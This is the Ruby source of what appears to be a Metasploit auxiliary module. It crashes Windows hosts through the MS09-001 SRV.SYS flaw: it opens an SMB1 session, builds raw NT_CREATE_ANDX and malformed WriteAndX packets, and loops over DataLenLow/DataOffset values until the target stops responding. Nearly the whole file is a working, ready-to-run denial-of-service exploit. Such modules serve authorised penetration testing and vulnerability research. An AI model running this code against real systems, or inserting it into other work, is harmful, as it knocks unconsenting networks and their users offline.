Path: blob/master/modules/auxiliary/dos/windows/smb/ms09_001_write.rb
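##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Denial-of-service module for MS09-001 (CVE-2008-4114): SRV.SYS mishandles a
# WriteAndX request whose DataOffset/DataLenLow fields point outside the packet.
# The module brute-forces DataLenLow/DataOffset pairs over an authenticated
# SMB1 session until the remote host stops responding.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::SMB::Client
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Microsoft SRV.SYS WriteAndX Invalid DataOffset',
        'Description' => %q{
          This module exploits a denial of service vulnerability in the
          SRV.SYS driver of the Windows operating system.

          This module has been tested successfully against Windows Vista.
        },
        'Author' => [ 'j.v.vallejo[at]gmail.com' ],
        'License' => MSF_LICENSE,
        'References' => [
          ['MSB', 'MS09-001'],
          ['OSVDB', '48153'],
          ['CVE', '2008-4114'],
          ['BID', '31179'],
        ],
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    # The packets below are raw SMB1 structures; connect() always negotiates
    # SMB1 only, so the protocol-version option is meaningless here.
    deregister_options('SMB::ProtocolVersion')
  end

  # Open a fresh SMB1 session, open the LSARPC pipe, then send one malformed
  # WriteAndX against the returned FileID.
  #
  # @param dlenlow    [Integer] value written into the WriteAndX DataLenLow field
  # @param doffset    [Integer] value written into the WriteAndX DataOffset field
  # @param fillersize [Integer] number of random bytes appended as request data
  #                            (also used for Remaining and ByteCount)
  # @return [void]
  # @raise whatever connect/smb_login/smb_recv_parse raise; the caller handles it
  #
  # The session is always torn down in +ensure+: every call opens a new socket
  # via connect(), so without an explicit disconnect each iteration of the
  # caller's search loop would leak a connection until module cleanup.
  def send_smb_pkt(dlenlow, doffset, fillersize)
    connect(versions: [1])
    smb_login

    pkt = CONST::SMB_CREATE_PKT.make_struct
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0xc807

    pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
    pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
    pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
    pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i

    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX

    pkt['Payload']['SMB'].v['WordCount'] = 24

    pkt['Payload'].v['AndX'] = 255
    pkt['Payload'].v['AndXOffset'] = 0xdede
    pkt['Payload'].v['FileNameLen'] = 14
    pkt['Payload'].v['CreateFlags'] = 0x16
    pkt['Payload'].v['AccessMask'] = 0x2019f # Maximum Allowed
    pkt['Payload'].v['ShareAccess'] = 7
    pkt['Payload'].v['CreateOptions'] = 0x400040
    pkt['Payload'].v['Impersonation'] = 2
    pkt['Payload'].v['Disposition'] = 1
    # UTF-16LE "\LSARPC" (the leading NUL is the alignment pad), NUL-terminated.
    pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" +
                                  "\x00\x00"

    simple.client.smb_send(pkt.to_s)
    ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)

    pkt = CONST::SMB_WRITE_PKT.make_struct
    _data_offset = pkt.to_s.length - 4
    filler = Rex::Text.rand_text(fillersize)

    pkt['Payload']['SMB'].v['Signature1'] = 0xcccccccc
    pkt['Payload']['SMB'].v['Signature2'] = 0xcccccccc
    pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
    pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
    pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
    pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
    pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
    pkt['Payload']['SMB'].v['Flags1'] = 0x18
    pkt['Payload']['SMB'].v['Flags2'] = 0xc807
    pkt['Payload']['SMB'].v['WordCount'] = 14
    pkt['Payload'].v['AndX'] = 255
    pkt['Payload'].v['AndXOffset'] = 0xdede
    pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
    pkt['Payload'].v['Offset'] = 0
    pkt['Payload'].v['Reserved2'] = -1
    pkt['Payload'].v['WriteMode'] = 8
    pkt['Payload'].v['Remaining'] = fillersize
    pkt['Payload'].v['DataLenHigh'] = 0
    # The two fields under test: a DataOffset/DataLenLow pair that does not
    # match the actual ByteCount/payload is what SRV.SYS fails to validate.
    pkt['Payload'].v['DataLenLow'] = dlenlow # <==================
    pkt['Payload'].v['DataOffset'] = doffset # <====
    pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc # <====
    pkt['Payload'].v['ByteCount'] = fillersize # <====
    pkt['Payload'].v['Payload'] = filler

    # Fire and forget: no response is read, the crash (if any) is server-side.
    simple.client.smb_send(pkt.to_s)
  ensure
    disconnect
  end

  # Walk DataOffset (outer) and DataLenLow (inner) from 0xffff down in steps of
  # 10000 with a fixed 72-byte filler, sending one WriteAndX per pair. Errors
  # from a single attempt (including the target no longer answering after a
  # successful crash) are reported and the search continues.
  def run
    print_line('Attempting to crash the remote host...')
    k = 72
    j = 0xffff
    while j > 10000
      i = 0xffff
      while i > 10000
        begin
          print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
          send_smb_pkt(i, j, k)
        rescue StandardError => e
          # Report why the attempt failed (login error, connection refused/reset
          # once the host is down, ...) instead of a bare 'rescue' marker.
          print_error("rescue: #{e.class}: #{e.message}")
        end
        i -= 10000
      end
      j -= 10000
    end
  end
end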